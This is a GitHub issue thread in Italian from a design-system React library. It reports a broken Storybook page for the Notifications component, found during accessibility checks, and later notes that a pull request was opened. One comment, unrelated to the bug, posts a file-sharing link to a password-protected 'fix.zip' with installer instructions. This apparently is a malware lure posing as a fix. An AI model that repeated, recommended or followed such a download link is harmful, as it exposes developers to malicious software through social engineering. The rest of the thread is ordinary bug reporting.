### ISSUE TITLE
Componente `Notifications`: la documentazione ha un errore

### ISSUE THREAD

**Issue by Fupete** [italia/design-react-kit#1094]
### Esiste già una discussione sul tema che ti interessa, o su un tema simile?

- [X] Ho verificato e non esiste

### Versione della libreria

5.2.0

### Cosa

C'è una scheda storybook in errore: https://italia.github.io/design-react-kit/?path=/story/documentazione-componenti-notification--notification-options-component-fake

### Perché

È un bug.

### Contesto

Verifiche di accessibilità sui componenti.

⚠️ Sarà da aggiornare lo status delle verifiche nella [board census ](https://github.com/orgs/italia/projects/32/views/1)alla risoluzione.

### Altro

Per referenza si segnala anche questa issue su Bootstrap Italia, che porterà a ulteriori sviluppi su questo componente: https://github.com/italia/bootstrap-italia/issues/1177

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Virtute90** [comment]
Inserita PR
